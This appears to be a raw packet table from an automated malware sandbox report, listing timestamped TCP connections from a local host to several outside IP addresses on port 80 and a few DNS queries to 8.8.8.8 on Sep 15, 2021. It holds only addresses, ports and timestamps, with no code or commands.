                                                                                      Sep 15, 2021 11:16:36.221348047 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.221363068 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.221369028 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.221394062 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.221419096 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.221434116 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.221456051 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.231786966 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.231820107 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.231837034 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.231854916 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.231946945 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.232547998 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.232573986 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.232587099 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.232594013 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.232611895 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.232630968 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.232633114 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.232656002 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.232686996 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.232692957 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.232752085 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.233926058 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.234026909 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.234060049 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.234122038 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.234144926 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.234147072 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.234164953 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.234174013 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.234184980 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.234201908 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.234206915 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.234227896 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.234251022 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.234272003 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.234280109 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.234286070 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.234291077 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.234291077 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.234311104 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.234313011 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.234332085 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.234333038 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.234353065 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.234354019 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.234374046 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.234380007 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.234395027 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.234401941 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.234419107 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.234431028 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.234452009 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.234468937 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.234491110 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.234508991 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.234510899 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.234528065 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.234530926 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.234549046 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.234553099 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.234590054 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.234612942 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322274923 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322318077 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322338104 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322361946 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322384119 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322407007 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322407961 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322429895 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322452068 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322467089 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322473049 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322474003 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322491884 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322495937 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322495937 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322499037 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322514057 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322518110 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322540998 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322542906 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322561026 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322566032 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322585106 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322588921 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322592020 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322608948 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322628975 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322630882 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322648048 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322652102 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322671890 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322674036 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322678089 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322695017 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322714090 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322721004 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322721958 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322741985 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322762012 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322767973 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322793007 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322817087 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322835922 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322839975 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322860956 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322860956 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322880030 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322884083 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322906017 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.322937012 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322949886 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322968960 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:36.322999954 CEST8049167198.23.212.143192.168.2.22
                                                                                      Sep 15, 2021 11:16:36.323039055 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:16:37.039201021 CEST4916780192.168.2.22198.23.212.143
                                                                                      Sep 15, 2021 11:17:59.711374044 CEST4916880192.168.2.22192.99.131.252
                                                                                      Sep 15, 2021 11:17:59.819895029 CEST8049168192.99.131.252192.168.2.22
                                                                                      Sep 15, 2021 11:17:59.820092916 CEST4916880192.168.2.22192.99.131.252
                                                                                      Sep 15, 2021 11:17:59.820272923 CEST4916880192.168.2.22192.99.131.252
                                                                                      Sep 15, 2021 11:17:59.927983046 CEST8049168192.99.131.252192.168.2.22
                                                                                      Sep 15, 2021 11:17:59.929552078 CEST8049168192.99.131.252192.168.2.22
                                                                                      Sep 15, 2021 11:17:59.929579973 CEST8049168192.99.131.252192.168.2.22
                                                                                      Sep 15, 2021 11:17:59.929830074 CEST4916880192.168.2.22192.99.131.252
                                                                                      Sep 15, 2021 11:17:59.929869890 CEST4916880192.168.2.22192.99.131.252
                                                                                      Sep 15, 2021 11:18:00.037594080 CEST8049168192.99.131.252192.168.2.22
                                                                                      Sep 15, 2021 11:18:05.000535965 CEST4916980192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:18:05.019366980 CEST804916934.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:18:05.019468069 CEST4916980192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:18:05.019635916 CEST4916980192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:18:05.038815975 CEST804916934.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:18:05.138832092 CEST804916934.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:18:05.138871908 CEST804916934.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:18:05.139081001 CEST4916980192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:18:05.139163017 CEST4916980192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:18:05.448091984 CEST4916980192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:18:05.467226982 CEST804916934.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:18:10.198261023 CEST4917080192.168.2.2234.98.99.30
                                                                                      Sep 15, 2021 11:18:10.216922998 CEST804917034.98.99.30192.168.2.22
                                                                                      Sep 15, 2021 11:18:10.216998100 CEST4917080192.168.2.2234.98.99.30
                                                                                      Sep 15, 2021 11:18:10.217118979 CEST4917080192.168.2.2234.98.99.30
                                                                                      Sep 15, 2021 11:18:10.235706091 CEST804917034.98.99.30192.168.2.22
                                                                                      Sep 15, 2021 11:18:10.331685066 CEST804917034.98.99.30192.168.2.22
                                                                                      Sep 15, 2021 11:18:10.331710100 CEST804917034.98.99.30192.168.2.22
                                                                                      Sep 15, 2021 11:18:10.331970930 CEST4917080192.168.2.2234.98.99.30
                                                                                      Sep 15, 2021 11:18:10.332066059 CEST4917080192.168.2.2234.98.99.30
                                                                                      Sep 15, 2021 11:18:10.643589973 CEST4917080192.168.2.2234.98.99.30
                                                                                      Sep 15, 2021 11:18:10.662631989 CEST804917034.98.99.30192.168.2.22
                                                                                      Sep 15, 2021 11:18:20.392560959 CEST4917180192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:18:20.411907911 CEST804917134.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:18:20.415950060 CEST4917180192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:18:20.416021109 CEST4917180192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:18:20.435089111 CEST804917134.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:18:20.531202078 CEST804917134.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:18:20.531235933 CEST804917134.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:18:20.531481028 CEST4917180192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:18:20.531893015 CEST4917180192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:18:20.551191092 CEST804917134.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:19:13.138228893 CEST4917680192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:19:13.156996965 CEST804917634.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:19:13.157138109 CEST4917680192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:19:13.157188892 CEST4917680192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:19:13.175884008 CEST804917634.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:19:13.272679090 CEST804917634.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:19:13.272706032 CEST804917634.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:19:13.273106098 CEST4917680192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:19:13.273137093 CEST4917680192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:19:13.579538107 CEST4917680192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:19:13.598278999 CEST804917634.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:19:54.694084883 CEST4918080192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:19:54.712135077 CEST804918034.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:19:54.712429047 CEST4918080192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:19:54.712455034 CEST4918080192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:19:54.729187012 CEST804918034.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:19:54.827491045 CEST804918034.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:19:54.827610016 CEST804918034.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:19:54.828061104 CEST4918080192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:19:54.828084946 CEST4918080192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:19:55.125889063 CEST4918080192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:19:55.145571947 CEST804918034.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:20:04.991322994 CEST4918280192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:20:05.010248899 CEST804918234.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:20:05.010549068 CEST4918280192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:20:05.010581970 CEST4918280192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:20:05.029567957 CEST804918234.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:20:05.125579119 CEST804918234.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:20:05.125627995 CEST804918234.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:20:05.126035929 CEST4918280192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:20:05.126090050 CEST4918280192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:20:05.422960043 CEST4918280192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:20:05.441910028 CEST804918234.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:20:10.119389057 CEST4918380192.168.2.22192.99.131.252
                                                                                      Sep 15, 2021 11:20:10.229751110 CEST8049183192.99.131.252192.168.2.22
                                                                                      Sep 15, 2021 11:20:10.229986906 CEST4918380192.168.2.22192.99.131.252
                                                                                      Sep 15, 2021 11:20:10.230083942 CEST4918380192.168.2.22192.99.131.252
                                                                                      Sep 15, 2021 11:20:10.339005947 CEST8049183192.99.131.252192.168.2.22
                                                                                      Sep 15, 2021 11:20:10.341188908 CEST8049183192.99.131.252192.168.2.22
                                                                                      Sep 15, 2021 11:20:10.341362953 CEST8049183192.99.131.252192.168.2.22
                                                                                      Sep 15, 2021 11:20:10.341655970 CEST4918380192.168.2.22192.99.131.252
                                                                                      Sep 15, 2021 11:20:10.341694117 CEST4918380192.168.2.22192.99.131.252
                                                                                      Sep 15, 2021 11:20:10.449862003 CEST8049183192.99.131.252192.168.2.22
                                                                                      Sep 15, 2021 11:20:15.345642090 CEST4918480192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:20:15.364419937 CEST804918434.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:20:15.364717007 CEST4918480192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:20:15.364769936 CEST4918480192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:20:15.383502960 CEST804918434.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:20:15.480021954 CEST804918434.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:20:15.480045080 CEST804918434.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:20:15.480292082 CEST4918480192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:20:15.480329037 CEST4918480192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:20:15.501646042 CEST804918434.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:20:20.478595972 CEST4918580192.168.2.2234.98.99.30
                                                                                      Sep 15, 2021 11:20:20.495536089 CEST804918534.98.99.30192.168.2.22
                                                                                      Sep 15, 2021 11:20:20.495969057 CEST4918580192.168.2.2234.98.99.30
                                                                                      Sep 15, 2021 11:20:20.496011972 CEST4918580192.168.2.2234.98.99.30
                                                                                      Sep 15, 2021 11:20:20.512862921 CEST804918534.98.99.30192.168.2.22
                                                                                      Sep 15, 2021 11:20:20.611011028 CEST804918534.98.99.30192.168.2.22
                                                                                      Sep 15, 2021 11:20:20.611038923 CEST804918534.98.99.30192.168.2.22
                                                                                      Sep 15, 2021 11:20:20.612113953 CEST4918580192.168.2.2234.98.99.30
                                                                                      Sep 15, 2021 11:20:20.612149000 CEST4918580192.168.2.2234.98.99.30
                                                                                      Sep 15, 2021 11:20:20.631091118 CEST804918534.98.99.30192.168.2.22
                                                                                      Sep 15, 2021 11:20:30.619699955 CEST4918680192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:20:30.639440060 CEST804918634.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:20:30.639772892 CEST4918680192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:20:30.639823914 CEST4918680192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:20:30.660191059 CEST804918634.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:20:30.756135941 CEST804918634.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:20:30.756170034 CEST804918634.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:20:30.756618977 CEST4918680192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:20:30.756675959 CEST4918680192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:20:30.778043032 CEST804918634.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:05.476473093 CEST4919180192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:05.496632099 CEST804919134.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:05.497091055 CEST4919180192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:05.497116089 CEST4919180192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:05.516303062 CEST804919134.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:05.612250090 CEST804919134.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:05.612282038 CEST804919134.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:05.612598896 CEST4919180192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:05.612621069 CEST4919180192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:05.928325891 CEST4919180192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:05.947422028 CEST804919134.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:43.699280977 CEST4919580192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:43.718441963 CEST804919534.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:43.718744993 CEST4919580192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:43.718801022 CEST4919580192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:43.737942934 CEST804919534.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:43.833789110 CEST804919534.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:43.833832026 CEST804919534.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:43.834177017 CEST4919580192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:43.834208965 CEST4919580192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:43.857525110 CEST804919534.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:53.918242931 CEST4919780192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:53.937359095 CEST804919734.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:53.937551975 CEST4919780192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:53.937608004 CEST4919780192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:53.956811905 CEST804919734.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:54.053649902 CEST804919734.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:54.053716898 CEST804919734.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:54.054013968 CEST4919780192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:54.054058075 CEST4919780192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:22:54.073905945 CEST804919734.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:22:59.051594973 CEST4919880192.168.2.22192.99.131.252
                                                                                      Sep 15, 2021 11:22:59.159210920 CEST8049198192.99.131.252192.168.2.22
                                                                                      Sep 15, 2021 11:22:59.159471035 CEST4919880192.168.2.22192.99.131.252
                                                                                      Sep 15, 2021 11:22:59.159507036 CEST4919880192.168.2.22192.99.131.252
                                                                                      Sep 15, 2021 11:22:59.268222094 CEST8049198192.99.131.252192.168.2.22
                                                                                      Sep 15, 2021 11:22:59.269926071 CEST8049198192.99.131.252192.168.2.22
                                                                                      Sep 15, 2021 11:22:59.270080090 CEST8049198192.99.131.252192.168.2.22
                                                                                      Sep 15, 2021 11:22:59.270243883 CEST4919880192.168.2.22192.99.131.252
                                                                                      Sep 15, 2021 11:22:59.270297050 CEST4919880192.168.2.22192.99.131.252
                                                                                      Sep 15, 2021 11:22:59.377002954 CEST8049198192.99.131.252192.168.2.22
                                                                                      Sep 15, 2021 11:23:04.278034925 CEST4919980192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:23:04.295078993 CEST804919934.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:23:04.295380116 CEST4919980192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:23:04.295397043 CEST4919980192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:23:04.312585115 CEST804919934.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:23:04.410657883 CEST804919934.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:23:04.410680056 CEST804919934.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:23:04.410995007 CEST4919980192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:23:04.411016941 CEST4919980192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:23:04.714140892 CEST4919980192.168.2.2234.102.136.180
                                                                                      Sep 15, 2021 11:23:04.732861042 CEST804919934.102.136.180192.168.2.22
                                                                                      Sep 15, 2021 11:23:09.410471916 CEST4920080192.168.2.2234.98.99.30
                                                                                      Sep 15, 2021 11:23:09.429657936 CEST804920034.98.99.30192.168.2.22
                                                                                      Sep 15, 2021 11:23:09.429820061 CEST4920080192.168.2.2234.98.99.30
                                                                                      Sep 15, 2021 11:23:09.429909945 CEST4920080192.168.2.2234.98.99.30
                                                                                      Sep 15, 2021 11:23:09.449114084 CEST804920034.98.99.30192.168.2.22
                                                                                      Sep 15, 2021 11:23:09.545253038 CEST804920034.98.99.30192.168.2.22
                                                                                      Sep 15, 2021 11:23:09.545285940 CEST804920034.98.99.30192.168.2.22
                                                                                      Sep 15, 2021 11:23:09.545588970 CEST4920080192.168.2.2234.98.99.30
                                                                                      Sep 15, 2021 11:23:09.545629025 CEST4920080192.168.2.2234.98.99.30
                                                                                      Sep 15, 2021 11:23:09.846986055 CEST4920080192.168.2.2234.98.99.30
                                                                                      Sep 15, 2021 11:23:09.866205931 CEST804920034.98.99.30192.168.2.22

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Sep 15, 2021 11:17:59.482459068 CEST5216753192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:17:59.700364113 CEST53521678.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:18:04.942955017 CEST5059153192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:18:04.998969078 CEST53505918.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:18:10.148118019 CEST5780553192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:18:10.197412014 CEST53578058.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:18:20.351397038 CEST5903053192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:18:20.391383886 CEST53590308.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:18:25.528527021 CEST5918553192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:18:25.567326069 CEST53591858.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:18:30.614634991 CEST5561653192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:18:30.646533012 CEST53556168.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:18:36.949275970 CEST4997253192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:18:36.980983973 CEST53499728.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:18:41.987869978 CEST5177153192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:18:42.020987034 CEST53517718.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:18:47.027700901 CEST5986753192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:18:47.058543921 CEST53598678.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:19:08.294406891 CEST5031553192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:19:08.324367046 CEST53503158.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:19:13.081938982 CEST5007253192.168.2.228.8.8.8
                                                                                      Sep 15, 2021 11:19:13.137840033 CEST53500728.8.8.8192.168.2.22
                                                                                      Sep 15, 2021 11:19:18.277448893 CEST5430453192.168.2.228.8.8.8
